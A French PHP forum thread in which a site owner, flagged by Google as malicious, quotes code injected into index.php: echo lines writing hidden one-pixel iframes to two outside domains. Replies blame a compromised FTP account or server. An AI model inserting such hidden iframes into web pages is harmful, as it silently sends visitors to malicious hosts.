IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Sécuriser une page web contre le hacking


Sujet :

Langage PHP

  1. #1
    Futur Membre du Club
    Inscrit en
    Août 2005
    Messages
    8
    Détails du profil
    Informations forums :
    Inscription : Août 2005
    Messages : 8
    Points : 8
    Points
    8
    Par défaut Sécuriser une page web contre le hacking
    Salut tout le monde,

    J'ai créé un site web qui est entre temps déclaré par google comme site malveillant. Après avoir téléchargé tous mes fichiers du site, j'ai rencontré des lignes de code bizarres insérées dans ma page index.php. J'aimerais savoir s'il y a une méthode de sécurité pour empêcher l'insertion de ces lignes de codes dans mes pages.

    Voici les lignes de code insérées :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    echo "<iframe src=\"http://internetcountercheck.com/?click=37179046\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";  echo "<iframe src=\"http://deisvop.net/?click=44C28\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    Ces lignes sont insérées dans ma page index.php de cette façon :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
     
    <?php 
     
                if(isset($_GET['theme'])){
                $variable=$_GET['theme'];
                switch($variable){
                case 'presentation': include("presentation.php");break;
    		    case 'chantiers': include("chantiers.php");break;
                case 'stages': include("stages.php");break;
    		    case 'projets': include("projets.php");break;
                case 'galerie': include("galerie.php");break;
                case 'contacts': include("contacts.php");break;
                case 'treat': include("traitement.php");break;
    			case 'cn': include("espace.php");break;
    			case 'ad': include("administrator.php");break;
    			default:  include("accueil.php");
    	      }
     
    		}else{ 
    		      include("accueil.php");
    		      }
              echo "<iframe src=\"http://internetcountercheck.com/?click=37179046\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";  echo "<iframe src=\"http://deisvop.net/?click=44C28\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; 
     
    ?>
    Ce serait un plaisir pour moi de trouver de vous une solution à ce problème.

  2. #2
    Membre du Club
    Profil pro
    Développeur Web
    Inscrit en
    Juin 2009
    Messages
    35
    Détails du profil
    Informations personnelles :
    Âge : 37
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Juin 2009
    Messages : 35
    Points : 46
    Points
    46
    Par défaut
    vu que c'est dans le code source, c'est quelqu'un qui t'a pirater ton acces ftp OU ton serveur (selon comment il est hébergé) !

    à mon avis tu devrais plus te diriger dans cette direction.. moi je n'y connais rien en sécurité ftp ou serveur etc désolé !

  3. #3
    Modérateur
    Avatar de Vil'Coyote
    Homme Profil pro
    Développeur adélia & Web
    Inscrit en
    Février 2008
    Messages
    4 583
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 44
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Développeur adélia & Web
    Secteur : Industrie

    Informations forums :
    Inscription : Février 2008
    Messages : 4 583
    Points : 7 503
    Points
    7 503
    Par défaut
    salut,
    en terme de "sécurité" tu l'utilisation de htacss qui permet de limiter pas mal de chose après en fonction du langage utilisé il y a différente méthodes à utiliser ou prendre en compte.

  4. #4
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Points : 44 155
    Points
    44 155
    Par défaut
    Comme l'a dit ash, il s'agit
    - soit d'un virus qui infecte ton poste (ou n'importe quel poste qui accèderait aux fichiers du serveur) et qui modifie tes fichiers ou transmet ton mot de passe.
    - soit d'une attaque directe sur le serveur.

    Il n'y a rien à faire contre ça au niveau PHP.

  5. #5
    Futur Membre du Club
    Inscrit en
    Août 2005
    Messages
    8
    Détails du profil
    Informations forums :
    Inscription : Août 2005
    Messages : 8
    Points : 8
    Points
    8
    Par défaut
    Citation Envoyé par sabotage Voir le message
    Comme l'a dit ash, il s'agit
    - soit d'un virus qui infecte ton poste (ou n'importe quel poste qui accèderait aux fichiers du serveur) et qui modifie tes fichiers ou transmet ton mot de passe.
    - soit d'une attaque directe sur le serveur.

    Il n'y a rien à faire contre ça au niveau PHP.
    Merci pour vos différents apports à ce sujet. Je pensais qu'il y a un moyen d'écrire un script pour enlever ces lignes de code à chaque insertion.

  6. #6
    Futur Membre du Club
    Inscrit en
    Août 2005
    Messages
    8
    Détails du profil
    Informations forums :
    Inscription : Août 2005
    Messages : 8
    Points : 8
    Points
    8
    Par défaut
    Ce que je veux dire un script en PHP qui parcourt les fichiers et supprime à chaque fois qu'il trouve ces lignes de code bizarres.

  7. #7
    Membre du Club
    Profil pro
    Développeur Web
    Inscrit en
    Juin 2009
    Messages
    35
    Détails du profil
    Informations personnelles :
    Âge : 37
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Juin 2009
    Messages : 35
    Points : 46
    Points
    46
    Par défaut
    Tu faire un script dit "réparateur" au cas où le problème ne soit pas que sur un seul fichier et que tu puisse tout supprimer sans devoir y jeter un coup d'œil, c'est bien ça ?

  8. #8
    Futur Membre du Club
    Inscrit en
    Août 2005
    Messages
    8
    Détails du profil
    Informations forums :
    Inscription : Août 2005
    Messages : 8
    Points : 8
    Points
    8
    Par défaut
    Citation Envoyé par ash_le_parisien Voir le message
    Tu faire un script dit "réparateur" au cas où le problème ne soit pas que sur un seul fichier et que tu puisse tout supprimer sans devoir y jeter un coup d'œil, c'est bien ça ?
    Oui, c'est bien ça ash_le_parisien. Comment le faire? Merci.

Discussions similaires

  1. Password pour sécuriser une page web Dreamweaver
    Par Romain707 dans le forum Balisage (X)HTML et validation W3C
    Réponses: 1
    Dernier message: 07/12/2011, 14h17
  2. Réponses: 5
    Dernier message: 26/02/2008, 17h57
  3. Sécuriser une page web
    Par Gizmil dans le forum Sécurité
    Réponses: 16
    Dernier message: 18/09/2007, 16h36
  4. Sécuriser une page web
    Par MORPHEUS50 dans le forum Balisage (X)HTML et validation W3C
    Réponses: 2
    Dernier message: 05/02/2007, 22h14

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo